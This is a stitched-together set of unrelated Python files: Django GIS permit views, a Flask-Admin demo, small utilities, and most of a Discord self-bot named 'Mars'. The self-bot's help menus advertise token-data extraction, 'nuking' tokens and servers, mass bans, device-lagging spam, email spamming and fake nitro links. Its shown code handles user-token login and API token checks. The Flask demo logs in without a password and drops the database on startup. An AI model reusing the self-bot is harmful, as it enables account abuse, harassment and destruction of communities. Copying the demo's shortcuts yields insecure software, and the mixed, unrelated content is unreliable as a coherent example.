    '''Return all permits active at a specific lat/lng'''
    response = {}
    # Reuse the shared decoder instead of duplicating lat/lon parsing inline
    # (keeps this view consistent with overview()).
    point = _decode_lat_lon(request)
    if point is not None:
        # GIS query asking for all Permits with a region that contains the
        # requested point
        permits = PermitArea.objects.filter(region__contains=point)
        response['permits'] = [p.to_dict() for p in permits]
        response['bounds'] = list(permits.extent())
    return HttpResponse(json.dumps(response), content_type='application/json')


def overview(request):
    '''Return basic information about the permit data that we have on file.'''
    permit_glom = PermitArea.objects.collect()
    # Decode the user's location (if available); only compute bounds when the
    # point actually falls inside the data's envelope.
    centroid = _decode_lat_lon(request)
    bounds = []
    if centroid is not None and permit_glom.envelope.contains(centroid):
        closest = PermitArea.objects.filter(
            region__distance_lt=(centroid, D(mi=1))
        ).distance(centroid).order_by('distance')
        bounds = list(closest.extent())
    # Every distinct first_seen/last_seen date in the data set.
    dates = []
    for o in PermitArea.objects.values('first_seen', 'last_seen').distinct():
        dates.append(o['first_seen'])
        dates.append(o['last_seen'])
    dates = list(set(dates))
    response = {
        'categories': sorted(PermitArea.objects.values_list('category', flat=True).distinct()),
        'towns': sorted(PermitArea.objects.values_list('township', flat=True).distinct()),
        'closest': {
            'permits': [],  # select none on overview; only the bounds are used
            'bounds': bounds
        },
        'dates': [d.isoformat() for d in sorted(dates)],
    }
    return HttpResponse(json.dumps(response), content_type='application/json')
#! /usr/bin/env python
# coding=utf-8
# Demo Flask application showing Flask-Admin integration with Flask-Login:
# the admin views, file manager and menu links are gated on authentication.
import sys
sys.path.append('../common')
import os.path
from flask import Flask, redirect, url_for
from flask_admin import Admin
from flask_login import (current_user, UserMixin, LoginManager, login_user,
                         logout_user)
from flask_admin.contrib.sqla import ModelView
from flask_admin.contrib.fileadmin import FileAdmin
from flask_admin.base import MenuLink, BaseView, expose
from ext import db
from users import User as _User

''' pip install Flask-Admin '''

app = Flask(__name__, template_folder='./templates',
            static_folder='./static')
app.config.from_object('config')
USERNAME = 'xiaoming'
db.init_app(app)
login_manager = LoginManager()
login_manager.init_app(app)


# Combine the project's User model with Flask-Login's session helpers.
class User(_User, UserMixin):
    pass


@app.before_first_request
def create_user():
    # Demo-only: rebuild the schema and seed a single known user on first
    # request.  NOTE(review): drop_all() destroys existing data — never do
    # this outside a demo.
    db.drop_all()
    db.create_all()
    user = User(name=USERNAME, email='a@dongwm.com', password='123')
    db.session.add(user)
    db.session.commit()


# Add an access condition to a menu link: only shown when logged in.
class AuthenticatedMenuLink(MenuLink):
    def is_accessible(self):
        return current_user.is_authenticated


# The inverse: only shown when NOT logged in.
class NotAuthenticatedMenuLink(MenuLink):
    def is_accessible(self):
        return not current_user.is_authenticated


@login_manager.user_loader
def user_loader(user_id):
    # Flask-Login callback: map a session user id back to a User instance.
    user = User.query.filter_by(id=user_id).first()
    return user


class MyAdminView(BaseView):
    @expose('/')
    def index(self):
        return self.render('authenticated-admin.html')

    def is_accessible(self):
        # Check whether the user is logged in; if not, Flask-Admin
        # responds with 403.
        return current_user.is_authenticated


@app.route('/')
def index():
    return '<a href="/admin/">Click me to get to Admin!</a>'


@app.route('/login/')
def login_view():
    # Demo login: no password check, just log in the seeded user.
    user = User.query.filter_by(name=USERNAME).first()
    login_user(user)
    return redirect(url_for('admin.index'))


@app.route('/logout/')
def logout_view():
    logout_user()
    return redirect(url_for('admin.index'))


admin = Admin(app, name='web_develop', template_mode='bootstrap3')
admin.add_view(ModelView(User, db.session))
# By default this generates the sub-path /admin/user; pass
# endpoint='new_user' to customize the route to /admin/new_user instead.
path = os.path.join(os.path.dirname(__file__), './static')
admin.add_view(FileAdmin(path, '/static/', name='Static Files'))
# Create a view named "Authenticated" that requires login to access.
admin.add_view(MyAdminView(name='Authenticated'))
# Links with category='Links' are grouped into a dropdown menu called "Links".
admin.add_link(MenuLink(name='Back Home', url='/'))
admin.add_link(NotAuthenticatedMenuLink(name='Login',
                                        endpoint='login_view'))
admin.add_link(MenuLink(name='Google', category='Links',
                        url='http://www.google.com/'))
admin.add_link(MenuLink(name='Github', category='Links',
                        url='https://github.com/dongweiming'))
admin.add_link(AuthenticatedMenuLink(name='Logout',
                                     endpoint='logout_view'))

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080, debug=True)
from enum import Enum


class PerceivedDeviceType(Enum):
    """Device classification as perceived by the host.

    NOTE(review): values mirror a Windows-style perceived-device-type code
    set — confirm against the consuming API before extending.
    """

    Undefined = 0           # device type not (yet) determined
    DigitalStillCamera = 1  # still-image camera device
import time
from datetime import datetime
from random import choice, randint

from pandas import DataFrame


class Log:
    """Generate a synthetic process-mining event log.

    Builds ``rows`` random (case, event, timestamp) triples drawn from
    ``cases`` distinct case ids and ``events`` distinct event ids, with
    timestamps scattered around "now", and exposes the result as a
    DataFrame sorted by case.
    """

    def __init__(self, cases, events, rows):
        # list(range(...)) instead of a trivial comprehension; '_' for
        # unused loop variables.
        self.cases = list(range(cases))
        self.events = list(range(events))
        self.case_data = [choice(self.cases) for _ in range(rows)]
        self.event_data = [choice(self.events) for _ in range(rows)]
        self.timestamp_data = [self._rand_datetime() for _ in range(rows)]
        self.df = DataFrame({"Case": self.case_data,
                             "Event": self.event_data,
                             "Timestamp": self.timestamp_data})
        self.df = self.df.sort_values(by="Case")

    def _rand_datetime(self):
        """Return a random datetime within +/- (events * 50 * cases) seconds of now.

        Renamed from ``__rand_datetime__``: dunder names are reserved for the
        language; a single leading underscore marks a private helper.
        """
        spread = len(self.events) * 50 * len(self.cases)
        rand_time = randint(round(time.time() - spread),
                            round(time.time() + spread))
        return datetime.fromtimestamp(rand_time)

    def as_dataframe(self):
        """Return the generated log as a pandas DataFrame."""
        return self.df

    def to_csv(self, path):
        """Write the generated log to ``path`` as CSV (no index column)."""
        self.df.to_csv(path, index=False)


log = Log(200, 50, 5000)
log.to_csv("c200-e50-r5000.csv")
import configparser
import getpass
import os
from typing import Type, Generic, List, Dict, Set

DEFAULT_HOSTNAME = "tristano.neuro.polymtl.ca"
DEFAULT_PORT = "80"
DEFAULT_CONFIGFILE = ".sctdbtool"


def _config_path():
    """Absolute path of the per-user configuration file (~/.sctdbtool)."""
    return os.path.join(os.path.expanduser("~"), DEFAULT_CONFIGFILE)


def setup(arguments: Dict):
    """This method will ask user input to configure the system with the
    hostname, username, etc, for the web management access.

    :param arguments: the CLI arguments (currently unused).
    :raises ValueError: if the entered port is not an integer.
    """
    print("Please enter the configuration below.")
    print("Press ENTER to accept default values (between brackets).\n")

    # Empty input falls back to the defaults shown in the prompt.
    hostname = input("Hostname of the Web Management [{}]: ".format(DEFAULT_HOSTNAME))
    hostname = hostname or DEFAULT_HOSTNAME
    port = input("Port of the Web Management [{}]: ".format(DEFAULT_PORT))
    port = port or DEFAULT_PORT
    username = input("Username: ")
    password = getpass.getpass("Password: ")

    config = configparser.ConfigParser()
    config['Global'] = {
        'hostname': hostname,
        'port': int(port),  # validates the port is numeric; stored as a string
        'username': username,
        'password': password,
    }
    config_path = _config_path()
    with open(config_path, 'w') as configfile:
        config.write(configfile)
    # The file stores a plaintext password: restrict access to the owner.
    os.chmod(config_path, 0o600)
    print("Configuration saved successfully !")


def read_setup():
    """Read the system configuration file.

    :return: a dict-like section with the configuration parameters.
    :raises RuntimeError: if the configuration file does not exist yet.
    """
    config_path = _config_path()
    if not os.path.exists(config_path):
        raise RuntimeError("Please run 'sct_dbtool setup' before.")
    config = configparser.ConfigParser()
    config.read(config_path)
    return config['Global']
# coding=utf8
# Mars self-bot bootstrap: imports, configuration loading and global state.
connected = False
print("Loading...")
print("Loading imports...")
import re
import sys
import os
import io
import json
import time
import socket
import random
import urllib
import string
import aiohttp
import smtplib
import discord
import asyncio
import requests
import datetime
import platform
import threading
import discord.guild
import translators as ts
from random import randint
from itertools import cycle
from colorama import Fore, init
from discord.ext import commands
from unshortenit import UnshortenIt
from bs4 import BeautifulSoup as bs4
from discord.ext.commands import bot, CommandNotFound
from discord_webhook import DiscordWebhook, DiscordEmbed
from discord.utils import get

print("Imports loaded.")

# configsettings.json names which per-user configuration file to load.
with open('data/configurations/configsettings.json', 'r') as configsettings:
    configsettings = json.load(configsettings)
    config_name = configsettings["config_name"]

# Config
try:
    with open('data/configurations/' + config_name + '.json', 'r') as settings:
        config = json.load(settings)
    token = config["token"]
    color = config["color"]
    errorcolor = config["error-color"]
    prefix = config["prefix"]
    streamurl = config["stream-url"]
    deletetimer = config["delete-timer"]
    nitrosniper = config["nitro-sniper"]
    nitrosniperredeem = config["nitro-redeem-token"]
    giveawaysniper = config["giveaway-sniper"]
    giveawaysniperdelay = config["giveaway-sniper-delay"]
    deletedmessagelogger = config["deleted-message-logger"]
    gmailaccount = config["gmail-account"]
    gmailaccountpassword = config["gmail-password"]
    title = config["title"]
    helpcommandemoji = config["emoji"]
    helpimage = config["help-image"]
    helpthumbnail = config["help-thumbnail"]
    mainimage = config["main-image"]
    mainthumbnail = config["main-thumbnail"]
    accountimage = config["account-image"]
    accountthumbnail = config["account-thumbnail"]
    networkingimage = config["networking-image"]
    networkingthumbnail = config["networking-thumbnail"]
    funimage = config["fun-image"]
    funthumbnail = config["fun-thumbnail"]
    abuseimage = config["abuse-image"]
    abusethumbnail = config["abuse-thumbnail"]
    cringeimage = config["cringe-image"]
    cringethumbnail = config["cringe-thumbnail"]
    privateimage = config["private-image"]
    privatethumbnail = config["private-thumbnail"]
    commandwebhook = config["webhook"]
    helptextbold = config["help-text-bold"]
except Exception:
    # Was a bare `except:`; narrowed so Ctrl-C / SystemExit still propagate.
    # Any missing key or unreadable file falls back to the "default" config
    # and relaunches the process.
    print("There was an error loading this config, booting to default")
    time.sleep(3)
    with open("data/configurations/configsettings.json", "r") as f:
        config = json.load(f)
    config["config_name"] = "default"
    with open("data/configurations/configsettings.json", "w") as f:
        json.dump(config, f, indent=4)
    os.system("python3 Mars.py")

# footer establishment
footer = "Made by Flairings#0608"
# name establishment
name = "Mars"
# Console color establishment
consolecolor = Fore.LIGHTRED_EX
# Colorama autoreset
init(autoreset=True)
# Time establishment (captured once at startup)
t = time.localtime()
current_time = time.strftime("%H:%M:%S", t)
start_time = time.time()
# export friends depend
encoding = sys.stdout.encoding
# Version establishment
version = "2.8.6"
# @bot.command amount establishment
amountofcommands = 105
# Bot establishment
bot = commands.Bot(description="Very cute self-bot | Made by Flairings#0608",
                   command_prefix=prefix, self_bot=True)

if nitrosniper == "true":
    if nitrosniperredeem == "":
        # No dedicated redeem token configured: fall back to the login token.
        nitrosniperredeem = token
    else:
        # Validate the redeem token against the API before starting.
        # BUGFIX: the response was previously bound to `re`, clobbering the
        # imported `re` module for the rest of the program.
        headers = {'Content-Type': 'application/json',
                   'authorization': nitrosniperredeem}
        url = 'https://discordapp.com/api/v6/users/@me/library'
        token_check = requests.get(url, headers=headers)
        if token_check.status_code == 200:
            pass
        else:
            print("Nitro sniper redeem token is invalid.")
            exit(0)


# login thing innit
def login():
    """Start the bot; report a disconnect if the token is rejected."""
    try:
        bot.run(token, bot=False)
    except discord.errors.LoginFailure:
        print(consolecolor + "Status: " + Fore.RED + "DISCONNECTED")
        connectionerrorprint("A fatal error has occurred, check your token")


def restartbot():
    """Relaunch the whole script in a fresh process."""
    os.system("python3 Mars.py")

# Removes default help command
# Strip the built-in help command; Mars ships its own (`mars`, aliased `help`).
bot.remove_command('help')
# connection establishment
connected = True
# Boolean for user relationship logging
logrelationships = True


# --- logging helpers -------------------------------------------------------
# The ten public log functions below used to be ten near-identical copies;
# they now share these two private helpers. Public names/signatures unchanged.

def _console_log(tag, tag_color, message):
    """Print one timestamped, colour-tagged log line to the console.

    NOTE(review): current_time is captured once at startup, so every line
    shows the launch time, not the time of the event — confirm intent.
    """
    print(Fore.LIGHTWHITE_EX + current_time + " | " + tag_color + "[" + tag +
          "]" + Fore.LIGHTWHITE_EX + " | " + message)


def _webhook_log(title, message, embed_color, footer_text=None):
    """Mirror a log line to the configured logging webhook (no-op when unset)."""
    if commandwebhook != "":
        webhook = DiscordWebhook(url=commandwebhook)
        embed = DiscordEmbed(title=title, description=message, color=embed_color)
        if footer_text is None:
            footer_text = "Mars | Logged in as: " + bot.user.name
        embed.set_footer(text=footer_text)
        webhook.add_embed(embed)
        webhook.execute()


def eventprint(message):
    """Log an event to console and webhook."""
    _console_log("Event", Fore.BLUE, message)
    _webhook_log('[EVENT]', message, 3778303)


def eventprintnowebhook(message):
    """Log an event to console only (used inside tight loops)."""
    _console_log("Event", Fore.BLUE, message)


def commandprint(message):
    """Log a command invocation to console and webhook."""
    _console_log("Command", Fore.YELLOW, message)
    _webhook_log('[COMMAND]', message, 16773456)


def errorprint(message):
    """Log an error to console and webhook."""
    _console_log("Error", Fore.RED, message)
    _webhook_log('[ERROR]', message, 16727357)


def errorprintnowebhook(message):
    """Log an error to console only."""
    _console_log("Error", Fore.RED, message)


def sniperprint(message):
    """Log a sniper hit to console and webhook."""
    _console_log("Sniper", Fore.GREEN, message)
    _webhook_log('[SNIPER]', message, 917248)


def connectionerrorprint(message):
    """Log a connection failure; webhook footer cannot show a username here."""
    _console_log("Connection Error", Fore.RED, message)
    _webhook_log('[CONNECTION ERROR]', message, 14221312,
                 footer_text="Mars | FAILED TO GET USERNAME")


def tokenprint(message):
    """Log token-related output to console and webhook."""
    _console_log("Token", Fore.LIGHTRED_EX, message)
    _webhook_log('[TOKEN]', message, 16727357)


def warningprint(message):
    """Log a warning to console and webhook."""
    _console_log("Warning", Fore.LIGHTYELLOW_EX, message)
    _webhook_log('[WARNING]', message, 16745506)


def detection(message):
    """Log a detection to console and webhook."""
    _console_log("Detection", Fore.RED, message)
    _webhook_log('[DETECTION]', message, 14155776)


# --- event handlers --------------------------------------------------------

@bot.event
async def on_connect():
    """Print the startup banner and announce the bot is online."""
    if connected:
        print("")
        print(Fore.LIGHTWHITE_EX + "- - - - " + Fore.LIGHTRED_EX + "Mars" +
              Fore.LIGHTWHITE_EX + " - - - -")
        print(Fore.LIGHTRED_EX + "Status: " + Fore.GREEN + "CONNECTED")
        print(Fore.LIGHTRED_EX + "Account: " + Fore.LIGHTWHITE_EX + bot.user.name)
        print(Fore.LIGHTRED_EX + "ID: " + Fore.LIGHTWHITE_EX + str(bot.user.id))
        print(Fore.LIGHTRED_EX + "Server-Count: " + Fore.LIGHTWHITE_EX +
              str(len(bot.guilds)))
        if nitrosniper == "true":
            print(Fore.LIGHTRED_EX + "Nitro-Sniper: " + Fore.GREEN + "Enabled")
        else:
            print(Fore.LIGHTRED_EX + "Nitro-Sniper: " + Fore.RED + "Disabled")
        if giveawaysniper == "true":
            print(Fore.LIGHTRED_EX + "Giveaway-Sniper: " + Fore.GREEN + "Enabled")
        else:
            print(Fore.LIGHTRED_EX + "Giveaway-Sniper: " + Fore.RED + "Disabled")
    else:
        print("Status: " + Fore.RED + "DISCONNECTED")
    if connected:
        eventprint("Mars is now online")
    else:
        connectionerrorprint("A fatal error has occurred")
        await bot.logout()
        input("Press enter key to continue")


@bot.event
async def on_relationship_remove(relationship):
    """Log friendships/blocks being removed (when relationship logging is on)."""
    if logrelationships:
        if relationship.user.name != bot.user.name:
            eventprint(f"relationship has been ended between {bot.user.name} and {relationship.user.name}")


@bot.event
async def on_relationship_add(relationship):
    """Log friendships/blocks being added (when relationship logging is on)."""
    if logrelationships:
        if relationship.user.name != bot.user.name:
            eventprint(f"relationship has been started between {bot.user.name} and {relationship.user.name}")


@bot.event
async def on_message_delete(message):
    """Log other users' deleted DMs when the deleted-message logger is enabled."""
    if deletedmessagelogger == "true":
        guild = message.guild
        if not guild:  # only direct messages (no guild attached)
            if message.author.id != bot.user.id:
                eventprint(f'{message.author} deleted a message | Channel: {message.channel} | Message: {message.content}')


@bot.event
async def on_command_error(ctx, error):
    """Report unknown commands and permission failures; re-raise anything else."""
    if isinstance(error, CommandNotFound):
        # BUGFIX: dropped a no-op `.format(error)` on a placeholder-less string.
        commandprint("User has executed an invalid command")
        em = discord.Embed(title="Command is invalid.", color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)
        return
    elif isinstance(error, commands.CheckFailure):
        commandprint("User is missing permissions to execute this command")
        em = discord.Embed(title="Invalid permissions to execute this command.", color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)
        return
    raise error


# --- help menus ------------------------------------------------------------

@bot.command(aliases=['help'])
async def mars(ctx):
    """Top-level help menu listing the command categories."""
    await ctx.message.delete()
    commandprint("Command 'help' has been used by " + bot.user.name)
    # (A redundant duplicate Embed construction was removed here.)
    if helptextbold == "true":
        embed = discord.Embed(title="", description=title + " \n", color=color)
        embed.add_field(name=f"**{helpcommandemoji} | Main**", value="**Main Commands** \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Account**", value="**Account Commands** \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Fun**", value="**Fun Commands** \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Abuse**", value="**Abuse Commands** \n ", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Cringe**", value="**Cringe Commands** \n", inline=False)
        embed.set_footer(text=footer)
        embed.set_image(url=helpimage)
        embed.set_thumbnail(url=helpthumbnail)
        await ctx.send("", embed=embed, delete_after=deletetimer)
    else:
        embed = discord.Embed(title="", description=title + " \n", color=color)
        embed.add_field(name=f"**{helpcommandemoji} | Main**", value="Main Commands \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Account**", value="Account Commands \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Fun**", value="Fun Commands \n", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Abuse**", value="Abuse Commands \n ", inline=False)
        embed.add_field(name=f"**{helpcommandemoji} | Cringe**", value="Cringe Commands \n", inline=False)
        embed.set_footer(text=footer)
        embed.set_thumbnail(url=helpthumbnail)
        embed.set_image(url=helpimage)
        await ctx.send("", embed=embed, delete_after=deletetimer)


@bot.command()
async def main(ctx):
    """Help page for the "Main" command category."""
    await ctx.message.delete()
    commandprint("Command 'main' has been used by " + bot.user.name)
    embed = discord.Embed(title=f"{helpcommandemoji} | Main", description="", color=color, )
    embed.add_field(name="**INFO**", value="information about self-bot \n", inline=False)
    embed.add_field(name="**LOGOUT**", value="Logs you out of the selfbot \n", inline=False)
    embed.add_field(name="**UPTIME**", value="Shows how long the selfbot has been online \n", inline=False)
    embed.add_field(name="**SETEMOJI**", value="changes the emojis in help command, default [優] \n", inline=False)
    embed.add_field(name="**SETTITLE**", value="changes the bot title \n", inline=False)
    embed.add_field(name="**SETPREFIX**", value="changes the bot prefix \n", inline=False)
    embed.add_field(name="**SETCONFIG**", value="changes the bot config \n", inline=False)
    embed.add_field(name="**SETSTREAMURL**", value="changes the stream url \n", inline=False)
    embed.add_field(name="**TOGGLENS**", value="toggles the nitro sniper \n", inline=False)
    embed.add_field(name="**TOGGLEGS**", value="toggles the giveaway sniper \n", inline=False)
    embed.add_field(name="**TOGGLEDML**", value="toggles the deleted message logger \n", inline=False)
    embed.add_field(name="**SETGMAILACCOUNT**", value="changes the gmail address used for gmail spammer \n", inline=False)
    embed.add_field(name="**SETGMAILPASSWORD**", value="changes the gmail password used for gmail spammer \n", inline=False)
    embed.add_field(name="**ASCII**", value="translates text into ascii", inline=False)
    embed.add_field(name="**PING**", value="checks if an ip or host is online", inline=False)
    embed.add_field(name="**IPLOOKUP**", value="gets the data of an ip address", inline=False)
    embed.add_field(name="**RESOLVE**", value="resolves the ip of a domain", inline=False)
    embed.add_field(name="**PORTS**", value="lists known ports of ip addresses", inline=False)
    embed.add_field(name="**GUILDICON**", value="gets the guilds icon", inline=False)
    embed.add_field(name="**EMOJISTEAL**", value="downloads all the emojis in a server", inline=False)
    embed.add_field(name="**USERINFO**", value="displays a users basic info", inline=False)
    embed.add_field(name="**FIRSTMESSAGE**", value="jump to the first message", inline=False)
    embed.add_field(name="**TRANSLATEFROM**", value="translates text into english", inline=False)
    embed.add_field(name="**TRANSLATETO**", value="translates your text into a specific language", inline=False)
    embed.add_field(name="**NAMEMC**", value="displays the info of a minecraft username", inline=False)
    embed.add_field(name="**SPAMWEBHOOK**", value="spams a webhook with a message and an amount", inline=False)
    embed.add_field(name="**TEXTTOBINARY**", value="translates text into binary", inline=False)
    embed.add_field(name="**BINARYTOTEXT**", value="translates binary from text", inline=False)
    embed.add_field(name="**CHECKTOKEN**", value="checks if a token is valid or not", inline=False)
    embed.set_footer(text=footer)
    embed.set_thumbnail(url=mainthumbnail)
    embed.set_image(url=mainimage)
    await ctx.send("", embed=embed, delete_after=deletetimer)


@bot.command()
async def account(ctx):
    """Help page for the "Account" command category."""
    await ctx.message.delete()
    commandprint("Command 'account' has been used by " + bot.user.name)
    embed = discord.Embed(title=f"{helpcommandemoji} | Account", description="status may not work if you already have one", color=color, )
    embed.add_field(name="**HYPESQUAD**", value="change your hypesquad \n", inline=False)
    embed.add_field(name="**EXPORTFRIENDS**", value="prints friends list to console \n", inline=False)
    embed.add_field(name="**AV**", value="get mentioned user profile picture \n", inline=False)
    embed.add_field(name="**STREAM**", value="add a stream status \n", inline=False)
    embed.add_field(name="**GAME**", value="add a game status \n", inline=False)
    embed.add_field(name="**WATCHING**", value="add a watching status \n", inline=False)
    embed.add_field(name="**LISTENING**", value="add a listening status \n", inline=False)
    embed.add_field(name="**CL**", value="clears chat \n", inline=False)
    embed.add_field(name="**ADMINCL**", value="clears chat in servers \n", inline=False)
    embed.add_field(name="**LEAVEALLGROUPS**", value="leave all groups \n", inline=False)
    # NOTE(review): description below looks copy-pasted from FIRSTMESSAGE —
    # confirm what TINYURL actually does before correcting the text.
    embed.add_field(name="**TINYURL**", value="jump to the first message", inline=False)
    embed.set_footer(text=footer)
    embed.set_thumbnail(url=accountthumbnail)
    embed.set_image(url=accountimage)
    await ctx.send("", embed=embed, delete_after=deletetimer)


@bot.command()
async def fun(ctx):
    """Help page for the "Fun" command category."""
    await ctx.message.delete()
    commandprint("Command 'fun' has been used by " + bot.user.name)
    embed = discord.Embed(title=f"{helpcommandemoji} | Fun", description="", color=color, )
    embed.add_field(name="**EMBED**", value="embeds your chosen message", inline=False)
    embed.add_field(name="**CHANGEMYMIND**", value="displays text on changemymind", inline=False)
    embed.add_field(name="**THREATS**", value="compares an image to other threats", inline=False)
    embed.add_field(name="**MAGIK**", value="warps an image to selected intensity", inline=False)
    embed.add_field(name="**IPHONEX**", value=" view an image on an iphonex", inline=False)
    embed.add_field(name="**DOXBIN**", value="searches something on doxbin", inline=False)
    embed.add_field(name="**PHUB**", value="searches something on pornhub", inline=False)
    embed.add_field(name="**YT**", value="searches something on youtube", inline=False)
    embed.add_field(name="**COVID**", value="shows status of covid-19", inline=False)
    embed.add_field(name="**TOPIC**", value="start a random topic", inline=False)
    embed.add_field(name="**QUESTION**", value="ask a question", inline=False)
    embed.add_field(name="**PENIS**", value="look down a users pants (dodgy)", inline=False)
    embed.add_field(name="**8BALL**", value="get an answer", inline=False)
    embed.add_field(name="**REVERSE**", value="make your text reversed", inline=False)
    embed.add_field(name="**TRUMPTWEET**", value="criminalize mr trump ", inline=False)
    embed.add_field(name="**TWEET**", value="fake tweet with username and message", inline=False)
    embed.add_field(name="**SHIP**", value="ships two names to a percentage", inline=False)
    embed.add_field(name="**GAY**", value="makes a users profile picture gay", inline=False)
    embed.add_field(name="**WASTED**", value="makes a users profile picture wasted from gta", inline=False)
    embed.add_field(name="**LYRICFINDER**", value="finds the lyrics of a song", inline=False)
    embed.add_field(name="**GENPASSWORD**", value="generate a random password", inline=False)
    embed.add_field(name="**FAKENITRO**", value="generate a fake discord nitro code", inline=False)
    embed.add_field(name="**IMG**", value="finds chosen image from the array", inline=False)
    embed.set_footer(text=footer)
    embed.set_thumbnail(url=funthumbnail)
    embed.set_image(url=funimage)
    await ctx.send("", embed=embed, delete_after=deletetimer)


@bot.command()
async def abuse(ctx):
    """Help page for the "Abuse" command category."""
    await ctx.message.delete()
    commandprint("Command 'abuse' has been used by " + bot.user.name)
    embed = discord.Embed(title=f"{helpcommandemoji} | Abuse", description="", color=color, )
    embed.add_field(name="**TOKENINFO**", value="shows sensitive data from a token", inline=False)
    embed.add_field(name="**NUKETOKEN**", value="Crash, glitch, remove friends of a token", inline=False)
    embed.add_field(name="**BAN**", value="ban an individual user", inline=False)
    embed.add_field(name="**UNBAN**", value="unban an individual user", inline=False)
    embed.add_field(name="**MASSBAN**", value="ban all users", inline=False)
    embed.add_field(name="**MASSUNBAN**", value="unban all users", inline=False)
    embed.add_field(name="**MASSKICK**", value="kicks all users", inline=False)
    embed.add_field(name="**NUKESERVER**", value="destroy entire server", inline=False)
    embed.add_field(name="**BANLIST**", value="display all currently banned users", inline=False)
    embed.add_field(name="**EMOJILAGGER**", value="spams emojies to lag a device", inline=False)
    embed.add_field(name="**ARABLAGGER**", value="spams arabic letters to lag devices", inline=False)
    embed.add_field(name="**CHANNELCRASHER**", value="spams unknown letters to lag devices", inline=False)
    embed.add_field(name="**SPAM**", value="spams chosen phrase", inline=False)
    embed.add_field(name="**GMAILSPAM**", value="spams a gmail with an amount and a message", inline=False)
    embed.set_footer(text=footer)
    embed.set_thumbnail(url=abusethumbnail)
    embed.set_image(url=abuseimage)
    await ctx.send("", embed=embed, delete_after=deletetimer)


@bot.command()
async def cringe(ctx):
    """Help page for the "Cringe" command category."""
    await ctx.message.delete()
    commandprint("Command 'cringe' has been used by " + bot.user.name)
    embed = discord.Embed(title=f"{helpcommandemoji} | Cringe", description="WARNING: command may not work in dms.", color=color, )
    embed.add_field(name="**KISS**", value="kiss another user", inline=False)
    embed.add_field(name="**CUDDLE**", value="cuddle another user", inline=False)
    embed.add_field(name="**PAT**", value="pat another user", inline=False)
    embed.add_field(name="**TICKLE**", value="tickle another user", inline=False)
    embed.add_field(name="**SLAP**", value="slap another user", inline=False)
    embed.add_field(name="**LESBIAN**", value="get lesbian shit", inline=False)
    embed.add_field(name="**LEWD**", value="get lewd images and gifs", inline=False)
    embed.add_field(name="**BLOWJOB**", value="you can imagine", inline=False)
    embed.add_field(name="**TITS**", value="at this point i don't need to explain", inline=False)
    embed.add_field(name="**BOOBS**", value="not explaining anymore", inline=False)
    embed.add_field(name="**HENTAI**", value="fuck off", inline=False)
    embed.set_footer(text=footer)
    embed.set_thumbnail(url=cringethumbnail)
    embed.set_image(url=cringeimage)
    await ctx.send("", embed=embed, delete_after=deletetimer)


# --- utility commands ------------------------------------------------------

@bot.command()
async def setconfig(ctx, configname = None):
    """Switch the named configuration file and persist the choice."""
    await ctx.message.delete()
    commandprint("Command 'setconfig' has been used by " + bot.user.name)
    if configname is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a configname \n" "Example: " + prefix + "setconfig default", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            if os.path.exists("data/configurations/" + configname + ".json"):
                with open("data/configurations/configsettings.json", "r") as f:
                    config = json.load(f)
                config["config_name"] = configname
                with open("data/configurations/configsettings.json", "w") as f:
                    json.dump(config, f, indent=4)
                eventprint("Configuration has been set to " + configname)
                embed = discord.Embed(title="CONFIGURATION CHANGED", description=f"Configuration is now '{configname}'. \n Restart the bot in order for changes to take place.", color=color)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
            else:
                eventprint("Configuration not found.")
                embed = discord.Embed(title="CONFIGURATION", description=f"Could not find configuration with that name.", color=color)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', Could not edit config ".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def fakenitro(ctx):
    """Post a plausible-looking (fake) discord.gift link."""
    await ctx.message.delete()
    commandprint("Command 'fakenitro' has been used by " + bot.user.name)
    try:
        code = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
        await ctx.send("https://discord.gift/" + code)
    except Exception as error:
        errorprint("Exception ' {0} ', unknown error ".format(error))
        em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)


# NOT FINISHED
@bot.command()
async def noleave(ctx, user: discord.User=None):
    """Stub command — body not implemented yet."""
    await ctx.message.delete()
    commandprint("Command 'noleave' has been used by " + bot.user.name)
    try:
        # codeee !
        print("d")
    except Exception as error:
        errorprint("Exception ' {0} ', unknown error ".format(error))
        em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def genpassword(ctx):
    """Generate a 16-character mixed-case alphanumeric password.

    NOTE(review): uses `random`, which is not cryptographically secure —
    consider `secrets` if these passwords are meant to be used for real.
    """
    await ctx.message.delete()
    commandprint("Command 'genpassword' has been used by " + bot.user.name)
    try:
        alphabet = "abcdefghijklmnopqrstuvwxyz"
        upperalphabet = alphabet.upper()
        pw_len = 16
        pwlist = []
        # Three characters (lower, upper, digit) per iteration, then pad
        # with lowercase letters up to pw_len and shuffle.
        for i in range(pw_len//3):
            pwlist.append(alphabet[random.randrange(len(alphabet))])
            pwlist.append(upperalphabet[random.randrange(len(upperalphabet))])
            pwlist.append(str(random.randrange(16)))
        for i in range(pw_len-len(pwlist)):
            pwlist.append(alphabet[random.randrange(len(alphabet))])
        random.shuffle(pwlist)
        pwstring = "".join(pwlist)
        embed = discord.Embed(title=f"**PASSWORD GENERATED**", description="Your generated password is " + pwstring + "", color=color)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    except Exception as error:
